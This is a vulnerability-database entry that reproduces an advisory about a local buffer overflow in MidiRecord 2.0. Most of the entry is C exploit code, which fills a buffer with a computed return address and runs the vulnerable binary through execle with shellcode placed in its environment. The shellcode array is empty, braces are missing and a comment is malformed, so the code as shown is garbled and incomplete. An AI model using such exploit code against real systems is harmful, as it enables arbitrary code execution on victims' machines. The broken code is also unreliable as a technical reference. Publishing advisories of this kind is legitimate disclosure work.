MidiRecord2 MidiRecord.CC Local Buffer Overflow Vulnerability

ID SSV:81861
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.

                                                source: http://www.securityfocus.com/bid/19190/info

Midirecord is prone to a local buffer-overflow vulnerability because it fails to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.

An attacker can exploit this issue to execute arbitrary code in the context of the victim running the affected application. 

Version 2.0 is vulnerable to this issue; other versions may also be affected.

* Successful Exploit in Ubuntu Breezey */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225
#define ALIGNMENT 1
int main(int argc, char **argv )
        char shellcode[]=

        if(argc < 2)
           fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);
             return 0;
        char *env[] = {shellcode, NULL};
        char buf[BUFSIZE];
                int i;
                int *ap = (int *)(buf + ALIGNMENT);
                int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

                for (i = 0; i < BUFSIZE - 4; i += 4)
                *ap++ = ret;
                execle(argv[1], "/dev/midi1", buf, NULL, env);